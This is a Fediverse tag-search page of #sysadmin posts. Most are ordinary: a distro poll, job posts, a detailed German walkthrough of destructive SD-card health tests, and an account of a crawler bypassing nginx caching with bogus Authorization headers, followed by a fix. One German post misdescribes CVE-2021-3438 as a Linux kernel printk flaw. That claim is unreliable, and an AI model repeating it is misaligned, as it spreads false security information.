social.dk-libre.fr is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people that use software like Mastodon, Pleroma, Friendica, etc. all around the world.

This server runs the snac software and there is no automatic sign-up process.

Search results for tag #sysadmin

🗳

[?]Windy city :verified: » 🌐
@pheonix@hachyderm.io

Okay, Linux people riddle me this.

I gotta help another old laptop begging to be upgraded to Linux from Windows. The user is not TUI literate and would prefer GUI based interactions. It is a hybrid graphics setup, Intel + AMD.

What would you suggest? Remember stability over cutting edge features.

Fedora:6
Mint:9
Ubuntu:2
(other - comment):6
representative image from google

Alt...representative image from google

    [?]Haack’s Networking » 🌐
    @oemb1905@gnulinux.social

    I love it when technology lifts get so big and technical that they eclipse enterprise solutions and return to fundamentals. That's my game. I'm here for you when that happens. It will happen. 🤣

    Also, it's always DNS.
    Also too, it's never a better time to switch to Debian.

      AodeRelay boosted

      [?]2.5 Admins » 🌐
      @25admins@mastodon.social

      2.5 Admins 313: Cooking with NVMe

      Microsoft claims that Windows 11 will work well with 8GB of RAM, some of the innovations coming to high end SSDs, the arguments for TP-Link Omada over UniFi Ubiquiti.

      2.5admins.com/2-5-admins-313/

      2.5 Admins artwork

      Alt...2.5 Admins artwork

        [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
        @mikebabcock@floss.social

        No matter how much you hate tools and what they represent, this video by Nate B Jones is worth watching if you want to be aware of what's going on in modern : youtu.be/FCRT7M30Wtw

        This type of agent behaviour has global implications we aren't on top of yet.

          AodeRelay boosted

          [?]ctsd » 🌐
          @ctsd@mastodon.social

          CVE-2021-3438 ist ein lokaler Privilegientrennungsfehler in der Linux-Kernel-Funktion `printk()`, der es lokalen Benutzern ermöglicht, beliebige Kernel-Logs zu schreiben und unter Umständen die Root-Shell zu erreichen. Der CVE wurde am 2021-05-04 veröffentlicht.

          Die betroffenen Systeme sollten umgehend gepatcht werden.

          ctsd.de/insights/2026-08-techn

          ctsd Insights Artikel

          Alt...ctsd Insights Artikel

            [?]skotperez » 🌐
            @skotperez@voragine.net

            Grep Exclude: Patterns, Files, and Directories

            [?]skotperez » 🌐
            @skotperez@voragine.net

            egrep command in Linux with examples

            [?]skotperez » 🌐
            @skotperez@voragine.net

            How can I tell when a MySQL table was last updated?

            [?]anarcat » 🌐
            @Anarcat@kolektiva.social

            rdm boosted

            [?]Michael W Lucas :flan_on_fire: » 🌐
            @mwl@io.mwl.io

            Computers are like onions. Everything is layers built on layers, and every layer makes you cry.

              [?]Pete Orrall [Pete/Pete] » 🌐
              @peteorrall@mastodon.bsd.cafe

              Fellow system administrators, what is the wonkiest system you've had to manage in your career?

                [?]Ludovic :Firefox: :FreeBSD: » 🌐
                @usul@piaille.fr

                I'd like my next job to have something more than Linux, yes, I'm looking at your FreeBSD.

                ↩ Ludovic Hirlimann :
                "I can work in both French and English. I'm interested in infrastructure roles.

                "

                [via Ponos] ponos.fr/thread/clf364ichbjbh9

                  [?]Ludovic :Firefox: :FreeBSD: » 🌐
                  @usul@piaille.fr

                  I can work in both French and English. I'm interested in infrastructure roles.

                  ↩ Ludovic Hirlimann :
                  "I've been remote, fully since 2009 and would like to keep it that way.

                  "

                  [via Ponos] ponos.fr/thread/c615qh73u2fb87

                    [?]Silke Meyer [she/her] » 🌐
                    @smeyer@univention.social

                    Der Vortrag zu von Christoph Stoettner ist sehr interessant! Ich wusste nicht, dass das Ding sooo viel kann. (Ich bin eine von denen, die bisher telnet nachinstalliert haben. 😄)

                    programm.froscon.org/froscon20

                      AodeRelay boosted

                      [?]-=Kernel-Error=- » 🌐
                      @kernel-error.de@www.kernel-error.de

                      Kein SMART für SD-Karten: sieben Linux-Werkzeuge, die trotzdem verraten, wie gesund eine Karte ist

                      SD-Karten liefern keine SMART-Werte, der Flash-Controller dahinter bleibt eine Blackbox. Was unter Linux trotzdem geht: Verhalten statt Register prüfen, mit f3, badblocks, flashbench und fio. Ich habe das an einer echten, entbehrlichen 8-GB-Karte durchgespielt, mit allen Befehlen und der rohen Ausgabe. [SENSITIVE CONTENT]

                      Eine alte 8-GB-microSD-Karte lag noch in der Schublade, entbehrlich genug für einen Härtetest. Die Ausgangsfrage war simpel: ist die Karte noch gut, oder produziert sie im Hintergrund längst stille Fehler? Bei einer SSD würde ich smartctl -a tippen und hätte binnen Sekunden Health-Prozent, Reallocated Sectors und Power-On-Hours auf dem Schirm. Bei einer SD-Karte geht genau das nicht, und der Grund dafür ist interessanter als die fehlende Zahl selbst.

                      Warum SMART hier nicht funktioniert

                      ATA- und NVMe-Laufwerke haben eine standardisierte SMART-Schnittstelle: fest definierte Attribute, die die Firmware selbst pflegt und die jedes Betriebssystem auf die gleiche Weise abfragen kann. SD-Karten haben nichts Vergleichbares. Der Flash-Controller auf der Karte übernimmt zwar Wear-Leveling und Bad-Block-Mapping, aber wie er das im Detail tut und was er darüber nach außen preisgibt, ist herstellerspezifisch und komplett verschlossen. Es gibt zwar eine SD Health Status Extension, CMD56-basiert, die unterstützt aber so gut wie kein Consumer-Werkzeug, und sie setzt einen nativen MMC-Host voraus, keinen USB-Kartenleser.

                      Ein Wort noch zu TRIM, bevor der Eindruck entsteht, SD-Karten hätten damit überhaupt nichts zu tun: der Linux-MMC-Stack unterstützt discard-artige Operationen für native mmcblk-Geräte durchaus. Nur bringt das über einen USB-Kartenleser nichts, weil die USB-Massenspeicher-Übersetzung diesen Pfad gar nicht durchreicht, das habe ich in diesem Test empirisch bestätigt. Und selbst auf einem nativen Host wäre das nur ein Erase-Hinweis an den Controller, keine standardisierte Health-Rückmeldung wie bei SSD-TRIM zusammen mit SMART.

                      Testkandidat und Aufbau

                      Für den Test kam eine Transcend Premium 8GB microSDHC zum Einsatz, Class 10, UHS-Speed-Class U1, in einem Samsung-Adapter auf volle SD-Größe gesteckt und über einen UGREEN-USB-Kartenleser ausgelesen. Der Leser meldet sich per USB als Genesys-Logic-Chip (05e3:0748), ein generischer Combo-Reader, wie er auch in vielen Laptops und günstigen USB-Dongles verbaut ist. Host war ein Linux Mint 22.3 mit Kernel 7.0.0-28-generic, Ubuntu-24.04-Unterbau, alle Befehle liefen als root.

                      So kam die Karte beim Testsystem an: microSD im Samsung-Adapter, gesteckt in den UGREEN-USB-Kartenleser.

                      Werkzeuge installieren

                      Bis auf badblocks, smartctl, hdparm und dd, die auf den meisten Systemen ohnehin vorhanden sind, kommt der Rest aus den Standard-Paketquellen, keine Drittanbieter-PPA nötig:

                      apt-get install -y f3 mmc-utils sdparm flashbench
                      apt-get install -y fio   # nachinstalliert, sobald der Schritt feststand

                      Installiert wurden f3 8.0, mmc-utils als Git-Snapshot von 2022, sdparm 1.12, flashbench 62 und fio 3.36, alles aus dem Ubuntu-Noble-Universe-Repository. Getestet auf Linux Mint 22.3, aber auf einem reinen Ubuntu 24.04 sollten Paketnamen und Versionen identisch sein.

                      Schritt 1: Identifikation, warum SMART eine Sackgasse ist

                      $ smartctl -a /dev/sdc
                      /dev/sdc: Unknown USB bridge [0x05e3:0x0748 (0x1209)]
                      Please specify device type with the -d option.
                      
                      $ smartctl -a -d sat /dev/sdc
                      Read Device Identity failed: scsi error unsupported scsi opcode
                      A mandatory SMART command failed: exiting.
                      
                      $ smartctl --scan
                      /dev/nvme0 -d nvme
                      /dev/nvme1 -d nvme
                      # sdc taucht gar nicht erst auf, smartd hält es für keinen unterstützten Gerätetyp
                      
                      $ sdparm -a /dev/sdc
                      MODE SENSE(10): Malformed SCSI command
                          /dev/sdc: Generic   MassStorageClass  1209
                      
                      $ sdparm -i /dev/sdc
                          /dev/sdc: Generic   MassStorageClass  1209
                      Device identification VPD page:
                        Addressed logical unit:
                          designator type: T10 vendor identification,  code set: ASCII
                            vendor id: Generic
                            vendor specific: STORAGE DEVICE

                      smartctl erkennt die Genesys-Logic-USB-Bridge gar nicht erst als unterstützten Gerätetyp. Erzwingt man SAT, also ATA-Kommandos über SCSI getunnelt, scheitert das vollständig, weil die Bridge-Firmware das Kommando schlicht nicht implementiert. Selbst der Geräte-Scan von smartd listet /dev/sdc gar nicht auf. sdparm kommt einen Schritt weiter, eine simple SCSI-INQUIRY funktioniert, aber die gemeldete Identität bleibt vollständig generisch: „Generic MassStorageClass“, „STORAGE DEVICE“. Weder Hersteller-ID noch Seriennummer noch irgendeine Form von Wear- oder Health-Daten sind über diesen Pfad erreichbar. Das ist der konkrete, reproduzierbare Beleg dafür, dass es für SD-Karten hinter einem USB-Leser kein SMART-Äquivalent gibt.

                      $ lsusb -v -d 05e3:0748
                      Bus 002 Device 007: ID 05e3:0748 Genesys Logic, Inc. All-in-One Cardreader
                        bcdUSB               3.10
                        idVendor           0x05e3 Genesys Logic, Inc.
                        idProduct          0x0748 All-in-One Cardreader
                        iSerial                 5 000000001209
                        bInterfaceClass         8 Mass Storage
                        bInterfaceSubClass      6 SCSI
                        bInterfaceProtocol     80 Bulk-Only
                        SuperSpeed USB Device Capability:
                          wSpeedsSupported   0x000e  (Full/High/SuperSpeed, bis zu 5Gbps Link)

                      Der Leser meldet sich als „All-in-One Cardreader“ von Genesys Logic, ein verbreiteter generischer Combo-Chip, USB-3.1-fähig, spricht auf der SCSI-Ebene aber Bulk-Only Transport (BOT), nicht UAS. Wichtig für die Kausalität: BOT statt UAS ist für sich genommen nicht der Grund, warum SAT-Passthrough scheitert. Es gibt genug BOT-Bridges, die SAT unterstützen, und genug, die es nicht tun, unabhängig vom Transportprotokoll. Belegt ist hier nur, dass ausgerechnet diese Genesys-Bridge keine ATA- beziehungsweise SAT-Kommandos durchreicht, nicht dass USB-Bulk-Only-Bridges das grundsätzlich nicht könnten.

                      Der Aufdruck verrät mehr als jedes Software-Tool: Transcend Premium, 8GB, Class 10, UHS-Speed-Class U1.

                      Schritt 2: Durchsatz mit dd und hdparm

                      hdparm -t allein ergab rund 90 MB/s gepuffertes Lesen, plausibel, aber es lohnt sich, mit echtem O_DIRECT-I/O gegenzuprüfen, damit keine Bridge- oder Seiten-Cache-Effekte den Wert verfälschen.

                      $ hdparm -Tt /dev/sdc
                       Timing cached reads:   24182 MB in  2.00 seconds = 12113.48 MB/sec
                       Timing buffered disk reads: 272 MB in  3.00 seconds =  90.66 MB/sec
                      
                      # 512MB Zufallsnutzlast zuerst im tmpfs erzeugt, damit die CPU-Last von
                      # /dev/urandom die eigentliche Messung nicht verfälscht
                      $ dd if=/dev/urandom of=/root/sdtest/payload.bin bs=1M count=512
                      536870912 Bytes (537 MB, 512 MiB) kopiert, 1,74754 s, 307 MB/s
                      
                      # SCHREIBEN: Direct I/O direkt auf das Rohgerät, kein Seiten-Cache beteiligt
                      $ dd if=/root/sdtest/payload.bin of=/dev/sdc bs=1M count=512 oflag=direct,sync
                      536870912 Bytes (537 MB, 512 MiB) kopiert, 22,8654 s, 23,5 MB/s
                      
                      # LESEN: erst flushen, dann Direct I/O der gleichen 512MB zurück
                      $ blockdev --flushbufs /dev/sdc
                      $ dd if=/dev/sdc of=/root/sdtest/readback.bin bs=1M count=512 iflag=direct
                      536870912 Bytes (537 MB, 512 MiB) kopiert, 6,28156 s, 85,5 MB/s
                      
                      # Integritätscheck
                      $ cmp /root/sdtest/payload.bin /root/sdtest/readback.bin
                      MATCH: identical

                      Ergebnis: rund 23,5 MB/s sequenzielles Schreiben, rund 85,5 MB/s sequenzielles Lesen, mit byteidentischem Rücklese-Ergebnis. Die Asymmetrie zwischen Schreiben und Lesen ist normal und erwartbar, Schreiben braucht auf Flash-Ebene ein Erase-before-Program, Lesen nicht. 23,5 MB/s reißt die Class-10- und U1-Mindestangabe von 10 MB/s locker, für U3/V30 mit 30 MB/s Minimum würde es nicht reichen, was exakt zum aufgedruckten Rating der Karte passt: Class 10, U1, keine U3- oder V30-Kennzeichnung.

                      Schritt 3: f3probe, ist die Kapazität echt?

                      Bevor der große, langsame Test kommt, lohnt sich der schnelle: f3 (Fight Flash Fraud) bringt mit f3probe einen Kapazitätsbetrugs-Check, der binnen weniger Minuten läuft, statt die ganze Karte zu beschreiben.

                      $ f3probe --time-ops /dev/sdc
                      
                      Probe finished, recovering blocks... Done
                      
                      Good news: The device `/dev/sdc' is the real thing
                      
                      Device geometry:
                      	         *Usable* size: 7.31 GB (15333376 blocks)
                      	        Announced size: 7.31 GB (15333376 blocks)
                      	                Module: 8.00 GB (2^33 Bytes)
                      	Approximate cache size: 0.00 Byte (0 blocks), need-reset=no
                      	   Physical block size: 512.00 Byte (2^9 Bytes)
                      
                      Probe time: 1'46"
                       Operation: total time / count = avg time
                            Read: 29.32s / 4197116 = 6us
                           Write: 1'15" / 4192321 = 18us
                           Reset: 0us / 1 = 0us

                      Verdikt: eine echte Karte, keine Fälschung. Die angekündigte Größe, 8-GB-Modul mit 7,31 GB nutzbar, deckt sich mit der tatsächlich nutzbaren Größe, die f3probe per binärer Suche gefunden hat, also dort, wo Schreibvorgänge aufhören, korrekt anzukommen. Approximate cache size: 0.00 Byte ist ebenfalls ein gutes Zeichen: manche gefälschten Karten täuschen ihre Kapazität vor, indem sie eine kleine Menge echten Flashs als Write-Back-Cache benutzen, der Schreibvorgänge über die tatsächliche Kapazität hinaus vorübergehend „schluckt“ und damit naive Benchmarks täuscht. Diese Karte zeigt diesen Trick nicht. f3probe hat die für die Prüfung benutzten Blöcke danach wiederhergestellt, ohne -n gestartet, die Karte blieb also in ihrem vorherigen, leeren Zustand. Reine Probe-Zeit rund 1:46 Minuten, mit Block-Wiederherstellung insgesamt rund 3 Minuten, deutlich schneller als ein vollständiger Schreib-Lese-Durchlauf, weil f3probe gezielt sucht statt jeden Block anzufassen.

                      Schritt 4: f3write und f3read, der Haupttest

                      $ wipefs -a /dev/sdc
                      $ parted -s /dev/sdc mklabel gpt mkpart primary ext4 0% 100%
                      $ mkfs.ext4 -F -L SDTEST /dev/sdc1
                      $ mount /dev/sdc1 /mnt/sdtest
                      $ df -h /mnt/sdtest
                      /dev/sdc1       7,2G     24K  6,8G    1% /mnt/sdtest
                      
                      $ cd /mnt/sdtest && f3write .
                      Free space: 7.10 GB
                      Creating file 1.h2w ... OK!
                      ...
                      Creating file 8.h2w ... OK!
                      Free space: 16.46 MB
                      Average writing speed: 22.78 MB/s
                      
                      $ f3read .
                                        SECTORS      ok/corrupted/changed/overwritten
                      Validating file 1.h2w ... 2097152/        0/      0/      0
                      ...
                      Validating file 8.h2w ...  176128/        0/      0/      0
                      
                        Data OK: 7.08 GB (14856192 sectors)
                      Data LOST: 0.00 Byte (0 sectors)
                      	       Corrupted: 0.00 Byte (0 sectors)
                      	Slightly changed: 0.00 Byte (0 sectors)
                      	     Overwritten: 0.00 Byte (0 sectors)
                      Average reading speed: 90.32 MB/s

                      Verdikt: sauber. Jedes Byte jeder der 8 Testdateien, 7,08 GB insgesamt, bis auf rund 16 MB Restplatz gefüllt, kam exakt so zurück, wie es geschrieben wurde: 0 korrupte, 0 veränderte, 0 überschriebene Sektoren. Die gemessenen Geschwindigkeiten, 22,78 MB/s Schreiben und 90,32 MB/s Lesen, decken sich eng mit dem rohen dd-Direct-I/O-Benchmark aus Schritt 2, eine gute Gegenprobe, dass die Zahlen echt sind und kein Artefakt einer einzelnen Methode.

                      Schritt 5: badblocks, die Musterprüfung

                      $ umount /mnt/sdtest
                      $ badblocks -wsv /dev/sdc
                      
                      Es wird nach defekten Blöcken gesucht (Lesen+Schreiben-Modus)
                      Von Block 0 bis 7666687
                      Es wird getestet Mit Muster 0xaa: ... 100% erledigt
                      Es wird getestet Mit Muster 0x55: ... 100% erledigt
                      Es wird getestet Mit Muster 0xff: ... 100% erledigt
                      Es wird getestet Mit Muster 0x00: ... 100% erledigt
                      Durchgang beendet, 0 defekte Blöcke gefunden. (0/0/0 Fehler)

                      Verdikt: 0 defekte Blöcke, über alle 4 Standard-Testmuster hinweg (0xAA/01010101, 0x55/10101010, 0xFF/lauter Einsen, 0x00/lauter Nullen, gewählt, um Stuck-at-0- und Stuck-at-1-Zellfehler ebenso wie Kopplungsfehler zwischen Nachbarbits zu erwischen). Gesamtlaufzeit für den kompletten Schreib-Lese-Vergleichs-Zyklus über alle 4 Muster: rund 26 Minuten 47 Sekunden auf dieser 7,31-GiB-Karte, was zur Schätzung von rund 27 Minuten aus den früheren Durchsatzwerten passt, 4-mal Schreibdurchlauf plus Lesedurchlauf bei rund 23,5/85 MB/s.

                      badblocks -w ist ein linearer, positionsbasierter Test, Teil von e2fsprogs. In einem Durchgang schreibt er dasselbe Muster auf jeden logischen Block und liest es zurück. Genau das ist der strukturelle Unterschied zu f3write/f3read, und der Grund, warum badblocks kein Ersatz für f3 bei der Kapazitätsbetrugsfrage ist: eine Karte, die Schreibvorgänge still auf einen kleineren physischen Bereich zurückführt, könnte in einem badblocks-Durchgang trotzdem das „richtige“ Muster zurückliefern, weil ohnehin jeder logische Block identischen Inhalt bekommt, das Aliasing bliebe unsichtbar. f3write vermeidet das, indem es positionsabhängige Pseudozufallsdaten schreibt, sodass Wraparound oder Aliasing als Mismatch auffällt. badblocks beantwortet dafür eine engere, ergänzende Frage: versagen bestimmte Blöcke oder Zellen dabei, irgendein Muster zuverlässig zu speichern, was der einmalige, pseudozufällige Schreibdurchgang von f3 pro Karte nicht so systematisch prüft, kein 0xAA/0x55/0xFF/0x00-Stuck-Bit-Sweep.

                      Schritt 6: flashbench, ein Blick unter die Haube

                      $ flashbench -f -o /root/sdtest/flashbench.out /dev/sdc
                      $ cat /root/sdtest/flashbench.out
                      
                      4MiB    28.5M/s  28.3M/s  26.7M/s  27.6M/s  23.4M/s  28M/s
                      2MiB    26.6M/s  28.2M/s  26.7M/s  28.1M/s  26.8M/s  28.1M/s
                      1MiB    26.6M/s  28.8M/s  26.4M/s  28.4M/s  26.6M/s  27.3M/s
                      512KiB  26.7M/s  28.2M/s  26.9M/s  28.9M/s  26.8M/s  28.3M/s
                      256KiB  26.7M/s  28.2M/s  26.6M/s  27.8M/s  27M/s    28.8M/s
                      128KiB  26M/s    28.5M/s  26.7M/s  28.3M/s  26.8M/s  28.3M/s
                      64KiB   26.9M/s  28.8M/s  26.8M/s  28.3M/s  26.7M/s  27.9M/s
                      32KiB   12.6M/s  12.7M/s  13.1M/s  12.6M/s  12.9M/s  12.8M/s
                      16KiB   5.78M/s  5.91M/s  5.87M/s  5.82M/s  5.82M/s  5.86M/s

                      flashbench -f (find-fat) liest am Ende der ersten paar Erase-Blöcke zunehmend kleinere Häppchen und misst die Zeit dafür, auf der Suche nach dem Punkt, an dem die Lesegeschwindigkeit plötzlich einbricht. Die Grundidee: das deutet auf die interne Lese- beziehungsweise Page-Granularität des Flashs hin, weil das Lesen eines Teils einer internen Page oder eines Blocks genauso viel kosten kann wie das Lesen der ganzen Einheit, sub-granulare Reads verschwenden dann Bandbreite. Hier hält sich das Plateau, rund 26 bis 29 MB/s, passend zum rohen sequenziellen Lese-Benchmark, stabil bis hinunter zu 64 KiB, bricht dann bei 32 KiB auf weniger als die Hälfte ein (rund 12,6 bis 13,1 MB/s) und nochmal auf etwa ein Fünftel bei 16 KiB (rund 5,8 bis 5,9 MB/s). Ein sauberes, reproduzierbares Signal, 6 Wiederholungen pro Zeile, alle konsistent.

                      Die Schlussfolgerung bleibt bewusst vorsichtig formuliert: das ist ein Performance-Knick bei 64 KiB auf diesem konkreten Reader-Controller-Pfad, konsistent mit einer größeren internen Leseeinheit oder FTL-Gruppierung, aber keine direkte, verifizierte Messung der tatsächlichen physischen NAND-Page-Größe der Karte (typischerweise 8 bis 16 KiB, dafür bräuchte es Herstellerdokumentation oder eine andere Messmethode). Die Daten sind mit einer bestimmten Erklärung konsistent, sie beweisen sie nicht.

                      Schritt 7: fio, bleibt die Schreibrate konstant?

                      dd und f3write liefern Durchschnittswerte. fio mit einem Bandbreiten-Log pro Sekunde zeigt dagegen die Form des Schreibvorgangs über die vollen 6 GB, genau das will man sehen, wenn man einen Pseudo-SLC-Cache-Absturz sucht: viele Karten schreiben schnell in einen kleinen SLC-Modus-Puffer, bis der voll ist, und fallen danach auf eine deutlich niedrigere TLC- oder QLC-Dauerschreibrate ab.

                      $ fio --name=sdcard-write --filename=/dev/sdc --rw=write --bs=1M --size=6G --direct=1 --ioengine=psync --iodepth=1 --write_bw_log=/root/sdtest/fio_write --log_avg_msec=1000 --group_reporting
                      
                      write: IOPS=26, BW=26.0MiB/s (27.3MB/s)(6144MiB/236179msec)
                      bw (KiB/s): min=24576, max=27675, per=100.00%, avg=26645.27, stdev=457.38, samples=236

                      Der Blick ins rohe Sekunden-Log lohnt sich, nicht nur die Zusammenfassung: 236 Einsekunden-Stichproben über den kompletten 6-GB-Schreibvorgang, alle im Bereich von 24576 bis 27675 KiB/s, also rund 24,0 bis 27,0 MB/s. Erste und letzte Stichprobe liegen im selben schmalen Band, kein erhöhter Burst am Anfang, kein Absturz später.

                      Verdikt: flach, kein erkennbarer SLC-Cache-Absturz auf dieser Karte. Auch hier lohnt sich die vorsichtige Formulierung: das beweist nicht, dass die Karte null Schreibpufferung hat, nur dass ein eventueller Puffer beziehungsweise Absturz innerhalb dieses 6-GB-Testfensters auf einer Karte mit nur rund 7,3 GB nutzbarer Gesamtkapazität nicht sichtbar wurde. Es könnte schlicht nicht genug Karte nach dem Puffer übrig sein, um einen Absturz zu zeigen, oder, wahrscheinlicher bei einer reinen Class-10/U1-Budgetkarte ohne A1/A2- oder „Extreme/Pro“-Einstufung, sie implementiert gar kein dynamisches SLC-Caching. So oder so steht das praktische Ergebnis: die Schreibleistung war über die gesamte Kapazität konsistent und vorhersagbar, nicht nach vorne verlagert.

                      Was für eMMC gilt, aber nicht für SD

                      Ein paar Dinge, die in diesem Testlauf nicht zum Einsatz kamen, aber der Vollständigkeit halber dazugehören. mmc extcsd read und seine Lebensdauer-Schätzfelder, das Nächste an einer echten Health-Prozentangabe in diesem Umfeld, sind eine eMMC-Eigenschaft. Eine wechselbare SD- oder microSD-Karte ist kein eMMC, dieser Pfad stand hier ohnehin nicht zur Verfügung, USB-Leser statt nativer MMC-Host. Ein nativer MMC-Host-Slot, etwa der eingebaute SD-Slot eines Laptops, würde dagegen mehr Identitätsdaten offenlegen als ein USB-Leser: /sys/block/mmcblkX/device/ mit cid, csd, scr, serial, manfid, name, oemid, preferred_erase_size und date, der Kernel parst die Identitätsregister der Karte direkt in sysfs, ganz ohne Zusatzwerkzeug. Wer also einen echten SD/MMC-Controller statt einer USB-SCSI-Bridge als Leser hat, bekommt das gratis dazu, in diesem Test war davon nichts erreichbar.

                      Und noch ein Missverständnis vorweg: der „SD Card Formatter“ der SD Association ist ein Formatierungs- und Reset-Werkzeug, das die werkseitige Partitionierung wiederherstellt, nachdem andere Betriebssysteme sie durcheinandergebracht haben, kein Health-Check-Werkzeug.

                      Die Reihenfolge, wenn du das nachmachen willst

                      Vom schnellsten und harmlosesten zum langsamsten und gründlichsten, ungefähr so, wie dieser Test auch abgelaufen ist:

                      1. lsusb -v, udevadm info, dmesg. Leser und Karte identifizieren, Schreibschutz-Status vorab prüfen.
                      2. smartctl -a -d sat und sdparm -a. Schneller, harmloser Versuch an Health- und Identitätsdaten, meist scheitert das über einen USB-Leser, und genau dieses Scheitern ist der Punkt, den man erklären sollte.
                      3. f3probe. Schneller Kapazitätsbetrugs-Check, für 8 GB etwa 2 bis 3 Minuten, minimal destruktiv, stellt die benutzten Blöcke standardmäßig wieder her.
                      4. f3write plus f3read. Der Haupttest, vollständige Schreib-Lese-Integritätsprüfung über die gesamte Kapazität, braucht ein Dateisystem.
                      5. badblocks -w. Destruktive Vier-Muster-Prüfung auf defekte Blöcke, Rohgerät, kein Dateisystem nötig. Fängt Dinge, die f3 strukturell nicht kann, siehe Schritt 5.
                      6. dd mit oflag/iflag=direct und/oder fio mit Bandbreiten-Log. Durchsatzzahlen und, mit fio, die Form der Schreibrate über die Zeit.
                      7. flashbench -f -o DATEI. Optional, für die Neugier, Hinweise auf die interne Lese-Granularität.

                      Fazit

                      Für diese konkrete Karte: gesund, echt, keine Defekte gefunden, bei jedem Test, der überhaupt in der Lage gewesen wäre, welche zu finden. Keine SMART-Werte erreichbar über den USB-Leser, echte Kapazität ohne Cache-Trickserei, null Datenkorruption über 7,08 GB, null defekte Blöcke über alle 4 Muster, rund 23 bis 27 MB/s Schreiben und rund 85 bis 90 MB/s Lesen, konsistent über vier unabhängige Messmethoden, kein SLC-Cache-Absturz über die volle Kapazität. Die Karte reißt ihre aufgedruckte Class-10/U1-Angabe locker, für U3/V30 würde es nicht reichen, was sie auch gar nicht behauptet.

                      Der eigentliche Punkt reicht über diese eine Karte hinaus: ohne SMART bleibt nur Verhaltenstestung statt Register-Abfrage. Schreiben, lesen, vergleichen, und der Karte dabei zusehen, statt sie nach einer Zahl zu fragen, die sie gar nicht hat.

                      Siehe auch

                      Falls jemand einen zuverlässigeren Weg zur Health-Einschätzung einer SD-Karte unter Linux kennt, immer her damit. Und falls ihr selbst öfter mit fragwürdigen Billigkarten zu tun habt, dürft ihr mich zu dem Thema sehr gerne fragen.

                      [?]Yavo » 🌐
                      @cleantext@fosstodon.org

                      Hi, guys, please recommend me a free DNS hosting service that:

                      * is reliable
                      * has a free tier
                      * EU or Europe-based organization, or has nodes on the continent
                      * good for super-low-traffic, mission-critical websites
                      * DNSSEC support is obligatory
                      * is not CloudFlare

                      Thanks!

                        [?]Lien Rag » 🌐
                        @lienrag@mastodon.tedomum.net

                        Apparemment en créant une clé bootable je me suis trompé de disque (pourtant il me semblait avoir vérifié plusieurs fois ?) et j'ai donc fait un dd d'une ISO de 7 Go sur le SSD chiffré qui contient mon système et mon /home.

                        Est-ce qu'il y a un moyen de récupérer le système ou au moins mes données ?

                        (je crains que non, hélas)
                        (je crois que j'avais sauvegardé mes headers LUKS mais aucune idée d'où)

                          [?]Darren » 🌐
                          @dplattsf@sfba.social

                          Sunday blues.. That sinking feeling when you've typed

                          shutdown -h now

                          been kicked off the server and yet the service running on the host seems to be inexplicably still working fine and then you realized you typed the command in the wrong window...

                            AodeRelay boosted

                            [?]Larvitz :fedora: » 🌐
                            @Larvitz@burningboard.net

                            In my last blog post I said I really don’t need any more peers for AS201379.

                            Then @reulnl showed up with: “Hey, want a connection to Piter-IX?”

                            Obviously, the correct sysadmin response was: yes.

                            So here we are: 10 peers now. Including one via LowPing.nl going straight to Piter-IX. 😅

                            At this point, “I should stop growing the network” has roughly the same credibility as “this is the last server I’m buying.”

                              AodeRelay boosted

                              [?]BlablaLinux » 🌐
                              @blablalinux@mastodon.blablalinux.be

                              Envoi d'un signal de mise sous tension pour tout faire repartir au propre.
                              À 4h07, Uptime-Kuma confirme : tout est repassé au vert ! 🟢

                                AodeRelay boosted

                                [?]BlablaLinux » 🌐
                                @blablalinux@mastodon.blablalinux.be

                                À 3h31, juste après Mastodon et avant le grand reboot de 4h, c'est au tour de PeerTube d'avoir son nettoyage automatique : « ✅ PeerTube Cleanup TERMINÉ » sur docker-peertube.
                                Purge des caches, ménage des fichiers temp et des médias fédérés. Au réveil, tout est propre sans avoir levé le petit doigt !

                                  AodeRelay boosted

                                  [?]BlablaLinux » 🌐
                                  @blablalinux@mastodon.blablalinux.be

                                  Décidément, la nuit réserve plein de surprises ! 🌙😜
                                  À 3h18 du matin, Gotify repasse par là : « ✅ Mastodon Cleanup TERMINÉ » sur le conteneur docker-mastodon.
                                  Un petit coup de balai automatique sur le cache et les médias distants pendant que tout le monde dort. Quand ton infra est plus disciplinée que toi ! 🧹🐘✨

                                    AodeRelay boosted

                                    [?]BlablaLinux » 🌐
                                    @blablalinux@mastodon.blablalinux.be

                                    Quand tu automatises tellement tout que tu en oublies tes propres scripts ! 😅
                                    À 23h pile, notification Gotify : purge massive et nettoyage de /var/log sur tous les nœuds du cluster Proxmox (purge_logs.sh).
                                    Le moment exact où tu te dis : « Ah oui c'est vrai, j'avais écrit un script pour ça ! » 😂
                                    C'est ça, la vraie magie d'un système qui tourne en totale autonomie !

                                      AodeRelay boosted

                                      [?]BlablaLinux » 🌐
                                      @blablalinux@mastodon.blablalinux.be

                                      Pour voir la capture en bonne résolution, rendez-vous sur Picsur : picsur.blablalinux.be/i/d41a86

                                      Fin du marathon d'automatisation. Bon week-end à tous !

                                        AodeRelay boosted

                                        [?]Rolle Laukkarinen » 🌐
                                        @rolle@mementomori.social

                                        Last night mementomori.social got a bit slow. Not terrible, but noticeable. Load average hit 26 on 8 cores and page loads took several seconds. The cause was an nginx caching failure I had not run into before, so I am writing it down.

                                        A crawler was hitting us from about 1500 IPs in a Singapore datacenter range. The problem was the requests sent bogus "Authorization: Basic" headers with every request.

                                        Mastodon answers several public API endpoints with "Vary: Authorization". That is correct, since the response differs for logged in and anonymous callers. But nginx honors Vary, so a request carrying an Authorization header is a different cache entry than one without it. On our setup every distinct header value got its own entry. Each crawler request produced a cache key nobody had ever asked for, missed, and went straight through to Puma, uncached. Oof.

                                        This was difficult to spot. Request volume looked normal for a social media server, PostgreSQL was idle, and nothing in the logs screamed "overload, overload!". The cache just stopped working on the busiest endpoints and the app servers took the whole load.

                                        You can check your own instance in a few seconds. First without an Authorization header:

                                        ```
                                        curl -sI https://your.instance/api/v1/trends/tags
                                        ```

                                        Then the same request with a junk header:

                                        ```
                                        curl -sI -H "Authorization: Basic dGVzdDp4" https://your.instance/api/v1/trends/tags
                                        ```

                                        X-Cached only appears if you have `add_header X-Cached $upstream_cache_status` in your config, which is worth adding. Otherwise watch Age. I tried this against a few other instances and the pattern holds: without the header you get a cache hit, with it you do not.

                                        The fix is one rule. Mastodon uses OAuth Bearer tokens and federation uses HTTP Signatures. Basic auth is never used, so any Basic header is bogus and can be rejected at the edge for no upstream cost:

                                        ```
                                        location @proxy {
                                        if ($http_authorization ~* "^Basic") { return 401; }
                                        ...
                                        }
                                        ```

